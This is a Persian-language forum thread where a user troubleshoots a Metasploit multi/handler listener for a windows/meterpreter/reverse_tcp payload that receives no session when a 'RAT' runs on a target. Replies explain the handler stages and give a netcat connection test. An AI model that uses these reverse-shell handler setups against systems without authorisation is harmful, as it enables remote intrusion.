اطلاعیه

بستن
هنوز اطلاعیه ای در دست نیست.

مشکل در استارت نشدن Exploit Handler

بستن
X

• فیلتر کردن
  • زمان
  • نمایش
Clear All
پست های جدید

مشکل در استارت نشدن Exploit Handler

با سلام و درود خدمت دوستان عزیز...

بنده در Exploit Handler در msf مشکل دارم و مشکلم اینه که استارت نمیشه یعنی بعد از زدن کد های زیر باید استارت شه که بتونم به Session ها دسترسی داشته باشیم ...

use multi/handler
    set paylod windows/meterpreter/reverse_tcp
    set lhost
    set lport
    exploit

درضمن به نظرم مشکل از اینه که رویه vmware کالی رو بالا اوردم بخاطر همین از vmware هم اقدام به باز کردن port کردم اما بازم اتفاقی نیوفتاد
    فایل های پیوست شده

نوشته شده توسط jk_3 مشاهده پست
    با سلام و درود خدمت دوستان عزیز...

بنده در Exploit Handler در msf مشکل دارم و مشکلم اینه که استارت نمیشه یعنی بعد از زدن کد های زیر باید استارت شه که بتونم به Session ها دسترسی داشته باشیم ...

use multi/handler
    set paylod windows/meterpreter/reverse_tcp
    set lhost
    set lport
    exploit

درضمن به نظرم مشکل از اینه که رویه vmware کالی رو بالا اوردم بخاطر همین از vmware هم اقدام به باز کردن port کردم اما بازم اتفاقی نیوفتاد

با سلام و احترام
    من نمیدونم دلیل پنهان کردن IP private و port چی بوده توی عکستون چون اون آیپی داخلی هست و به درد کسی نمیخوره و اینکه خط پایینش IP و port‌ای که مشخص کردید رو باز هم نشون داده :)
    مشکل از خیلی چیزها میتونه باشه, از ساختار شبکه داخلیتون گرفته تا تدابیر امنیتی موجود روی سیستم هدف. به عنوان مثال از اونجا که reverse هست, ممکنه فایروال سیستم هدف بلاک کنه کانکشن رو

کامنت

نوشته شده توسط constantine مشاهده پست

با سلام و احترام
      من نمیدونم دلیل پنهان کردن IP private و port چی بوده توی عکستون چون اون آیپی داخلی هست و به درد کسی نمیخوره و اینکه خط پایینش IP و port‌ای که مشخص کردید رو باز هم نشون داده :)
      مشکل از خیلی چیزها میتونه باشه, از ساختار شبکه داخلیتون گرفته تا تدابیر امنیتی موجود روی سیستم هدف. به عنوان مثال از اونجا که reverse هست, ممکنه فایروال سیستم هدف بلاک کنه کانکشن رو

تو این مرحله اصلا رت به هدف داده نشده ... به صورت طبیعی باید exploit handler استارت شه یعنی اگه تو عکس دقت کنید بعد از اخرین بیغام سیستم باید یه بیغام دیگه بده که نمیده و دیگه بعدش نمیتونم دستوری رو اجرا کنم ...

کامنت

نوشته شده توسط jk_3 مشاهده پست

تو این مرحله اصلا رت به هدف داده نشده ... به صورت طبیعی باید exploit handler استارت شه یعنی اگه تو عکس دقت کنید بعد از اخرین بیغام سیستم باید یه بیغام دیگه بده که نمیده و دیگه بعدش نمیتونم دستوری رو اجرا کنم ...
        خیر مراحل بدین صورت هست: ابتدا حالت listen (که برای شما دقیقا صحیح هست و توی همین حالت مونده)
        کد PHP:
        ... Started reverse TCP handler on 

زمانی که فایل execute میشه
        کد PHP:
        .... Sending stage (11111 bytesto 

و در نهایت یک Meterpreter session براتون باز میشه.
        اگر میخواهید تست کنید که فرآیند بالا صحیح اجرا میشه, یک ترمینال دیگه باز کنید و دستور زیر رو بزنید:
        کد PHP:
        nc -nv 192.168.112.132 443 

موفق باشید
        آخرین ویرایش توسط constantine; در تاریخ/ساعت 05-02-2018, 07:53 PM.

کامنت

نوشته شده توسط constantine مشاهده پست

خیر مراحل بدین صورت هست: ابتدا حالت listen (که برای شما دقیقا صحیح هست و توی همین حالت مونده)
          کد PHP:
          ... Started reverse TCP handler on 

زمانی که فایل execute میشه
          کد PHP:
          .... Sending stage (11111 bytesto 

و در نهایت یک Meterpreter session براتون باز میشه.
          اگر میخواهید تست کنید که فرآیند بالا صحیح اجرا میشه, یک ترمینال دیگه باز کنید و دستور زیر رو بزنید:
          کد PHP:
          nc -nv 192.168.112.132 443 

موفق باشید
          بله دوست عزیز درسته اما همین طور که گفتین دقیقا باید
          .... Sending stage (11111 bytes) to رو بزنه
          اما نمیزنه و وقتی تارگت رت رو ران میکنه واسه من چیزی نشون نمیده
          مشکل اینه که .... Sending stage (11111 bytes) to نمیاد

کامنت

درباره انجمن منطقه لینوکسی ها

انجمن منطقه لینوکسی ها با هدف ارتقاء سطح علمی کاربران در سطح جهانی و همچنین کمک به بالا بردن سطح علمی عمومی در زمینه های تخصصی فوق پایه گذاری شده است. انجمن منطقه لینوکسی ها از طریق کارشناسان و متخصصان پاسخگوی سوالات گوناگون کاربران مبتدی یا پیشرفته میباشد تا حد امکان تلاش شده که محیطی متنوع و کاربر پسند و به دور از هرگونه حاشیه جهت فعالیت کاربران در این انجمن ایجاد شود. لذا ما به صورت مستمر برای پیشرفت کمی و کیفی محتوی و اطلاعات انجمنمان میکوشیم که این برای ما ارزشمند و حائز اهمیت است. کلیه حقوق،اطلاعات و مقالات در این انجمن متعلق به سایت منطقه لینوکسی ها میباشد، و هرگونه نسخه برداری بدون ذکر منبع مورد پیگرد قانونی خواهد شد.

شبکه های اجتماعی
          در حال انجام ...
          X